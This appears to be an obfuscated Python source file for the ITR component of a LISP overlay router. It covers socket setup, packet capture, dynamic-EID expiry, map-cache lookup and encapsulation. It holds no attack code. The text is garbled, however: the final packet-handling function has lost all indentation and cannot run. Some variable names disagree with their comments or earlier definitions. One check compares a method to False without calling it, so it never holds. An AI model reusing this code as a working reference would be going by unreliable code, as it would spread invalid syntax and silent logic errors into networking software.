if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
i1iIIi1 = threading . Lock ( )      # passed to packet-capture threads -- TODO confirm what it guards
if 50 - 50: i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
def IIiiIiI1(parameter):
    """Render ITR 'show' command output via the shared lispconfig helper."""
    return lispconfig.lisp_itr_rtr_show_command(parameter, "ITR", [])
if 41 - 41: OoOoOO00
if 13 - 13: Oo0Ooo . i11iIiiIii - iIii1I11I1II1 - OoOoOO00
if 6 - 6: I1IiiI / Oo0Ooo % Ii1I
if 84 - 84: i11iIiiIii . o0oOOo0O0Ooo
if 100 - 100: Ii1I - Ii1I - I1Ii111
if 20 - 20: OoooooooOO
if 13 - 13: i1IIi - Ii1I % oO0o / iIii1I11I1II1 % iII111i
def oo(parameter):
    """Render the ITR crypto-key list (parameter is unused by the helper)."""
    return lispconfig.lisp_show_crypto_list("ITR")
if 68 - 68: I11i + OOooOOo . iIii1I11I1II1 - IiII % iIii1I11I1II1 - ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
def I1i1iii(parameter):
    """Render RLOC-probe state for the ITR (parameter is unused)."""
    return lispconfig.lisp_itr_rtr_show_rloc_probe_command("ITR")
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
def oo0(lisp_sockets, lisp_ephem_port):
    """60-second periodic ITR housekeeping.

    Drops all per-nonce crypto keys, re-requests the L2-overlay broadcast
    MAC mapping when configured, times out stale map-cache entries, and
    reschedules itself with a new threading.Timer.
    """
    lisp.lisp_set_exception()

    # Drop and reset the nonce-keyed crypto keys.
    for key_list in lisp.lisp_crypto_keys_by_nonce.values():
        for key in key_list:
            del(key)
    lisp.lisp_crypto_keys_by_nonce = {}

    # For an L2 overlay, refresh the all-FFs broadcast MAC mapping.
    if lisp.lisp_l2_overlay:
        afi = lisp.LISP_AFI_MAC
        iid = lisp.lisp_default_iid
        source = lisp.lisp_address(afi, "0000-0000-0000", 0, iid)
        source.mask_len = 0
        dest = lisp.lisp_address(afi, "ffff-ffff-ffff", 48, iid)
        lisp.lisp_send_map_request(lisp_sockets, lisp_ephem_port, source,
                                   dest, None)

    lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)

    # NOTE(review): no `global i11` here, so this rebinding is local and the
    # module-level timer handle keeps pointing at the old timer -- confirm
    # that is intended.
    i11 = threading.Timer(60, oo0, [lisp_sockets, lisp_ephem_port])
    i11.start()
    return
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
def OO0oOoOO0oOO0(lisp_socket):
    """Periodically expire dynamic-EIDs that have gone quiet.

    For every database entry configured for dynamic-EIDs, remove entries
    whose last packet is older than their timeout, notifying the ETR over
    IPC so it can withdraw them.  Reschedules itself when done.
    """
    lisp.lisp_set_exception()

    now = lisp.lisp_get_timestamp()
    for db in lisp.lisp_db_list:
        if db.dynamic_eid_configured() == False: continue

        expired = []
        for dyn_eid in db.dynamic_eids.values():
            last_heard = dyn_eid.last_packet
            if last_heard == None: continue
            if last_heard + dyn_eid.timeout > now: continue

            # With hardware forwarding, trust the switch's activity view
            # before expiring the EID.
            if lisp.lisp_program_hardware:
                prefix = dyn_eid.dynamic_eid.print_prefix_no_iid()
                if lisp.lisp_arista_is_alive(prefix):
                    lisp.lprint(("Hardware indicates dynamic-EID {} " +
                                 "still active").format(lisp.green(prefix,
                                                                   False)))
                    continue

            # Tell the ETR process this dynamic-EID went away.
            eid_str = dyn_eid.dynamic_eid.print_address()
            ipc = "learn%{}%None".format(eid_str)
            ipc = lisp.lisp_command_ipc(ipc, "lisp-itr")
            lisp.lisp_ipc(ipc, lisp_socket, "lisp-etr")

            lisp.lprint("Dynamic-EID {}".format(lisp.bold(
                lisp.green(eid_str, False) + " activity timeout", False)))
            expired.append(eid_str)

        # Remove the expired entries after iteration to avoid mutating the
        # dict while walking it.
        for eid_str in expired: db.dynamic_eids.pop(eid_str)

    threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
                    OO0oOoOO0oOO0, [lisp_socket]).start()
    return
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
def oOooOo0():
    """Return the machine's network interface names.

    macOS gets a fixed list; otherwise `ifconfig` output is parsed,
    handling both the old 'Link encap' and the newer ': flags=' formats.
    """
    if lisp.lisp_is_macos():
        return ["en0", "en1", "lo0"]

    marker = "Link encap"
    out = commands.getoutput("ifconfig | egrep '{}'".format(marker))
    if out == "":
        marker = ": flags="
        out = commands.getoutput("ifconfig | egrep '{}'".format(marker))

    interfaces = []
    for line in out.split("\n"):
        name = line.split(marker)[0].replace(" ", "")
        interfaces.append(name)
    return interfaces
if 36 - 36: IiII
if 36 - 36: ooOoO0o / O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
def I111I1Iiii1i():
    """One-time ITR bring-up: open sockets, start capture, arm timers.

    Returns True on success, False when local addresses cannot be
    determined.
    """
    global II1iII1i
    global oO0oIIII
    global Oo0oO0oo0oO00
    global i111I
    global II1Ii1iI1i
    global Ii1IIii11, Oooo0000

    lisp.lisp_i_am("itr")
    lisp.lisp_set_exception()
    lisp.lisp_print_banner("ITR starting up")

    lisp.lisp_get_local_interfaces()
    lisp.lisp_get_local_macs()
    if lisp.lisp_get_local_addresses() == False: return (False)

    # Control sockets: one sender per address family plus named IPC sockets.
    II1iII1i[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
    II1iII1i[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
    oO0oIIII = lisp.lisp_open_listen_socket("", "lisp-itr")
    Oo0oO0oo0oO00 = lisp.lisp_open_listen_socket("", "lispers.net-itr")
    II1iII1i[2] = oO0oIIII

    # Raspbian cannot bind the IPv6 wildcard here.
    bind_address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
    i111I = lisp.lisp_open_listen_socket(bind_address, str(iiI1iIiI))
    II1Ii1iI1i = lisp.lisp_open_listen_socket("0.0.0.0", str(OOo))

    # Raw sockets used for packet forwarding.
    Ii1IIii11 = socket.socket(socket.AF_INET, socket.SOCK_RAW,
                              socket.IPPROTO_RAW)
    Ii1IIii11.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
    if lisp.lisp_is_raspbian() == False:
        Oooo0000 = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
                                 socket.IPPROTO_UDP)

    lisp.lisp_ipc_socket = oO0oIIII

    # Run packet capture on its own thread.
    threading.Thread(target=OoOOo0OOoO).start()

    lisp.lisp_load_checkpoint()
    lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)

    # NOTE(review): `i11` is assigned without a `global` declaration, so the
    # module-level handle is not updated here -- confirm that is intended.
    i11 = threading.Timer(60, oo0, [II1iII1i, iiI1iIiI])
    i11.start()

    threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
                    OO0oOoOO0oOO0, [oO0oIIII]).start()
    return (True)
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
def o0ooooO0o0O():
    """Count 'prefix {' sub-clauses inside the 'lisp database-mapping'
    section(s) of ./lisp.config."""
    count = 0
    in_db_mapping = False
    with open("./lisp.config", "r") as config:
        for line in config:
            if line == "lisp database-mapping {\n": in_db_mapping = True
            if line == "}\n": in_db_mapping = False
            if not in_db_mapping: continue
            # Sub-clauses are indented; count only indented prefix lines.
            if line[0] == " " and "prefix {" in line: count += 1
    return count
if 48 - 48: ooOoO0o / I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / i1IIi
if 92 - 92: Oo0Ooo % Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
def O00oOOooo():
    """Wait until every configured database-mapping has been processed.

    Polls until lisp.lisp_db_list matches the count parsed from
    ./lisp.config, then returns (eid_prefixes, dynamic_eid_prefixes) for
    the IPv4/IPv6/MAC entries.
    """
    expected = o0ooooO0o0O()

    # Poll interval is overridable via the environment.
    wait = os.getenv("LISP_ITR_WAIT_TIME")
    wait = 1 if wait == None else int(wait)

    while expected != len(lisp.lisp_db_list):
        lisp.lprint(("Waiting {} second(s) for {} database-mapping EID-" +
                     "prefixes, {} processed so far ...").format(
                         wait, expected, len(lisp.lisp_db_list)))
        time.sleep(wait)

    eid_prefixes = []
    dynamic_prefixes = []
    for db in lisp.lisp_db_list:
        if not (db.eid.is_ipv4() or db.eid.is_ipv6() or db.eid.is_mac()):
            continue
        prefix = db.eid.print_prefix_no_iid()
        if db.dynamic_eid_configured(): dynamic_prefixes.append(prefix)
        eid_prefixes.append(prefix)
    return (eid_prefixes, dynamic_prefixes)
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
def OoOOo0OOoO():
    """Start packet-capture threads for the ITR.

    Waits for the database-mappings to load, builds the pcap filter (or a
    control-plane-only filter when an external data plane is in use),
    then spawns one capture thread per selected interface plus
    RLOC-probe-only captures on the remaining interfaces.
    """
    global i1iIIi1

    lisp.lisp_set_exception()

    # EID-prefixes we capture for, and the dynamic subset.
    sources, dynamic_eids = O00oOOooo()

    cp_filter = None
    if lisp.lisp_ipc_data_plane:
        lisp.lprint(lisp.bold("Data-plane packet capture disabled", False))
        cp_filter = "(udp src port 4342 and ip[28] == 0x28)" + \
            " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
        lisp.lprint("Control-plane capture: '{}'".format(cp_filter))
    else:
        lisp.lprint("Capturing packets for source-EIDs {}".format(
            lisp.green(str(sources), False)))
    if lisp.lisp_pitr: lisp.lprint("Configured for PITR functionality")

    l2_overlay = lisp.lisp_l2_overlay
    if l2_overlay == False:
        if lisp.lisp_is_linux(): OO0oOOoo(sources, dynamic_eids)

    # Build the capture filter unless the control-plane-only one applies.
    if cp_filter == None:
        if lisp.lisp_pitr:
            pcap_filter = o00oOo0oOoo(sources, [], False, True)
        else:
            pcap_filter = o00oOo0oOoo(sources, dynamic_eids, l2_overlay,
                                      False)
    else:
        pcap_filter = cp_filter

    # Restrict to user-selected interfaces when LISP_PCAP_LIST is set.
    interfaces = oOooOo0()
    pcap_list = os.getenv("LISP_PCAP_LIST")
    if pcap_list == None:
        label = ""
        rloc_interfaces = []
    else:
        selected = list(set(pcap_list.split()) & set(interfaces))
        rloc_interfaces = list(set(pcap_list.split()) ^ set(interfaces))
        label = "user-selected "
        lisp.lprint("User pcap-list: {}, active-interfaces: {}".format(
            pcap_list, interfaces))
        interfaces = selected

    for device in interfaces:
        capture_args = [device, pcap_filter, i1iIIi1]
        lisp.lprint("Capturing packets on {}interface {}".format(label,
                                                                 device))
        threading.Thread(target=iIi1, args=capture_args).start()
    if cp_filter: return

    # On excluded RLOC interfaces, still capture RLOC-probe replies.
    probe_filter = "(udp src port 4342 and ip[28] == 0x28)"
    for device in rloc_interfaces:
        capture_args = [device, probe_filter, i1iIIi1]
        lisp.lprint("Capture RLOC-probe replies on RLOC interface {}".format(
            device))
        threading.Thread(target=iIi1, args=capture_args).start()
    return
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
def I1II():
    """Shut down the ITR: cancel the pending timer and close every socket."""
    if I11: I11.cancel()

    # Close the send sockets, the two ephemeral listeners, then the named
    # IPC sockets.
    for sock, name in ((II1iII1i[0], ""),
                       (II1iII1i[1], ""),
                       (i111I, ""),
                       (II1Ii1iI1i, ""),
                       (oO0oIIII, "lisp-itr"),
                       (Oo0oO0oo0oO00, "lispers.net-itr")):
        lisp.lisp_close_socket(sock, name)
    return
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
# Data-plane input routine for the lisp-itr process.  The pcap callback
# hands us 'packet' with the L2 header already stripped; 'device' is the
# capture interface, 'input_interface' the logical (possibly VLAN)
# interface, 'macs' a formatted MAC string for logging ("" if none), and
# 'my_sa' a flag set by the caller from the frame's MAC addressing.
# The function either (1) punts RLOC-probe replies to the control-plane,
# (2) natively forwards packets destined to local EID-prefixes, (3) sends
# a Map-Request when no usable map-cache entry exists, or (4) LISP-
# encapsulates to a remote RLOC (unicast) / replicates over an RLE
# (multicast).  Returns None in all cases.
def IIIii ( packet , device , input_interface , macs , my_sa ) :
global II1iII1i
global iiI1iIiI
global Ii1IIii11 , Oooo0000
global oO0oIIII
if 83 - 83: IiII % o0oOOo0O0Ooo % I1IiiI . iIii1I11I1II1 - IiII
if 88 - 88: OoooooooOO
if 84 - 84: OoOoOO00 / I11i * iII111i / oO0o - i11iIiiIii . Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
# If this is a RLOC-probe Map-Reply captured on a pcap interface, hand it
# to the control-plane parser and stop data-plane processing.  The helper
# returns a modified packet (and source/port/ttl) when it is a probe.
I1iIiI11I1 = packet
packet , i1oOOoo0o0OOOO , i1IiII1III , i1O00oo = lisp . lisp_is_rloc_probe ( packet , 1 )
if ( I1iIiI11I1 != packet ) :
if ( i1oOOoo0o0OOOO == None ) : return
lisp . lisp_parse_packet ( II1iII1i , packet , i1oOOoo0o0OOOO , i1IiII1III , i1O00oo )
return
if 77 - 77: iII111i % OOooOOo - I11i % ooOoO0o - OoO0O00 / Oo0Ooo
if 4 - 4: OoooooooOO - i1IIi % Ii1I - OOooOOo * o0oOOo0O0Ooo
# Wrap and parse the inner header; drop the packet if it cannot decode.
packet = lisp . lisp_packet ( packet )
if ( packet . decode ( False , None , None ) == None ) : return
if 85 - 85: OoooooooOO * iIii1I11I1II1 . iII111i / OoooooooOO % I1IiiI % O0
if 36 - 36: Ii1I / II111iiii / IiII / IiII + I1ii11iIi11i
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
# When my_sa is set, treat the pcap device as the input interface.
if ( my_sa ) : input_interface = device
if 2 - 2: OoooooooOO % OOooOOo
if 63 - 63: I1IiiI % iIii1I11I1II1
if 39 - 39: iII111i / II111iiii / I1ii11iIi11i % I1IiiI
if 89 - 89: I1Ii111 + OoooooooOO + I1Ii111 * i1IIi + iIii1I11I1II1 % I11i
# Stamp the instance-id configured for the input interface onto both
# inner addresses so later lookups are scoped to the right VPN.
oOo0oO = packet . inner_source
OO00Oo = lisp . lisp_get_interface_instance_id ( input_interface , oOo0oO )
packet . inner_dest . instance_id = OO00Oo
packet . inner_source . instance_id = OO00Oo
if 5 - 5: OOooOOo - OOooOOo . Oo0Ooo + OoOoOO00 - OOooOOo . oO0o
if 31 - 31: II111iiii - iIii1I11I1II1 - iIii1I11I1II1 % I11i
if 12 - 12: iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
# Log receipt of the packet (MAC info appended when present).
if ( macs != "" ) : macs = ", MACs: " + macs + ","
packet . print_packet ( "Receive {}{}" . format ( device , macs ) , False )
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if 47 - 47: OoooooooOO
# Frame was captured on a device other than its resolved input
# interface (not our MAC) -- ignore it.
if ( device != input_interface ) :
lisp . dprint ( "Not our MAC address on interface {}, pcap interface {}" . format ( input_interface , device ) )
if 4 - 4: I1IiiI % I11i
return
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
# LISP-Decent pull-exception: a locally sourced multicast packet is
# allowed through even though its source is a local address.
II1i1i1iII1 = lisp . lisp_decent_push_configured
if ( II1i1i1iII1 ) :
oOo000 = packet . inner_dest . is_multicast_address ( )
IIi = packet . inner_source . is_local ( )
II1i1i1iII1 = ( IIi and oOo000 )
if 27 - 27: OOooOOo % Ii1I
if 58 - 58: OOooOOo * o0oOOo0O0Ooo + O0 % OOooOOo
if ( II1i1i1iII1 == False ) :
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
# The source must match one of our database-mapping EID-prefixes;
# otherwise this host is not an EID we serve.
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False )
if ( Oo0ooOo0o == None ) :
lisp . dprint ( "Packet received from non-EID source" )
return
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
if 23 - 23: oO0o - OOooOOo + I11i
# Dynamic-EID handling: discover the EID on this interface if the
# configuration allows it; otherwise drop the packet.
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) :
II11 = lisp . lisp_allow_dynamic_eid ( input_interface ,
packet . inner_source )
if ( II11 ) :
lisp . lisp_itr_discover_eid ( Oo0ooOo0o , packet . inner_source ,
input_interface , II11 , oO0oIIII )
else :
Iiii11iIi1 = lisp . green ( packet . inner_source . print_address ( ) , False )
lisp . dprint ( "Disallow dynamic-EID {} on interface {}" . format ( Iiii11iIi1 ,
input_interface ) )
return
if 40 - 40: I11i % OoO0O00 . I1Ii111
if 84 - 84: OoOoOO00 % ooOoO0o - OoOoOO00 . o0oOOo0O0Ooo
if 5 - 5: OoOoOO00 * I1Ii111 - I1ii11iIi11i / iIii1I11I1II1 % oO0o + IiII
# Do not data-plane-process our own LISP control packets.
if ( packet . inner_source . is_local ( ) and
packet . udp_dport == lisp . LISP_CTRL_PORT ) : return
if 51 - 51: I1Ii111 * II111iiii % ooOoO0o
if 98 - 98: OoO0O00 . I11i % II111iiii
if 71 - 71: I1Ii111 % i1IIi - II111iiii - OOooOOo + OOooOOo * ooOoO0o
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
# Per-family input checks (checksum/TTL validation) and TTL decrement;
# non-IP frames go through MAC input handling and use the L2 data port.
if ( packet . inner_version == 4 ) :
packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
else :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
packet . encap_port = lisp . LISP_L2_DATA_PORT
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
# oo0O000oO is a module-level flag (presumably the PITR setting captured
# at startup -- TODO confirm).  When not acting as a PITR, packets whose
# destination matches one of our own (non-dynamic) EID-prefixes are
# natively forwarded instead of encapsulated.
if ( oo0O000OoO == False ) :
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( Oo0ooOo0o and Oo0ooOo0o . dynamic_eid_configured == False ) :
lisp . dprint ( ( "Packet destined to local EID-prefix {}, " + "natively forwarding" ) . format ( Oo0ooOo0o . print_eid_tuple ( ) ) )
if 33 - 33: I1Ii111
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
return
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
# Map-cache lookup for the destination EID.
OoO000O = lisp . lisp_map_cache_lookup ( packet . inner_source , packet . inner_dest )
if 94 - 94: OoOoOO00 . O0 / Ii1I . I1ii11iIi11i - i1IIi
if 26 - 26: OoO0O00 - OOooOOo . o0oOOo0O0Ooo
if 65 - 65: I1ii11iIi11i % O0 % iIii1I11I1II1 * Ii1I
if 31 - 31: Ii1I
if 44 - 44: OoOoOO00 - iIii1I11I1II1 - Oo0Ooo
if 80 - 80: iIii1I11I1II1 * I1Ii111 % I11i % Oo0Ooo
if 95 - 95: iIii1I11I1II1 - I1ii11iIi11i . I1Ii111 - I1IiiI
# If the entry says native-forward and the database entry has a
# secondary instance-id, retry the lookup in that secondary IID.
OOOOoo = Oo0ooOo0o . secondary_iid if ( Oo0ooOo0o != None ) else None
if ( OOOOoo and OoO000O and OoO000O . action == lisp . LISP_NATIVE_FORWARD_ACTION ) :
o000 = packet . inner_dest
o000 . instance_id = OOOOoo
OoO000O = lisp . lisp_map_cache_lookup ( packet . inner_source , o000 )
if 94 - 94: o0oOOo0O0Ooo + O0 / I11i . I1IiiI + OOooOOo . iIii1I11I1II1
if 62 - 62: OoOoOO00 / I1IiiI - I1ii11iIi11i - I1IiiI + i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if 8 - 8: o0oOOo0O0Ooo
# No entry (or explicit send-map-request action): issue a rate-limited
# Map-Request and drop the packet for now.
if ( OoO000O == None or OoO000O . action == lisp . LISP_SEND_MAP_REQUEST_ACTION ) :
if ( lisp . lisp_rate_limit_map_request ( packet . inner_source ,
packet . inner_dest ) ) : return
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet )
return
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
# Entry exists but its TTL elapsed: refresh it in the background while
# continuing to use the stale entry for forwarding.
if ( OoO000O and OoO000O . is_active ( ) and OoO000O . has_ttl_elapsed ( ) ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( OoO000O . print_eid_tuple ( ) , False ) ) )
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
if 63 - 63: I1ii11iIi11i
if 6 - 6: ooOoO0o / I1ii11iIi11i
# Account the packet against the map-cache entry's statistics.
OoO000O . stats . increment ( len ( packet . packet ) )
if 57 - 57: I11i
if 67 - 67: OoO0O00 . ooOoO0o
if 87 - 87: oO0o % Ii1I
if 83 - 83: II111iiii - I11i
# Pick an RLOC (or an RLE for multicast replication) for this packet.
iiIii1IIi , ii1IiIiI1 , OOOoOo00O , O0ooOo0o0Oo , OooO0oOo = OoO000O . select_rloc ( packet , oO0oIIII )
if 66 - 66: OoO0O00 * Oo0Ooo
if 28 - 28: OoO0O00 % OoOoOO00 % I1ii11iIi11i + I1IiiI / I1IiiI
# No RLOC and no RLE: either native-forward (if the action says so) or
# drop because nothing is reachable.
if ( iiIii1IIi == None and OooO0oOo == None ) :
if ( O0ooOo0o0Oo == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet )
return
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
lisp . dprint ( "No reachable RLOCs found" )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet )
return
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
# A null RLOC encodes an explicit drop action.
if ( iiIii1IIi and iiIii1IIi . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet )
return
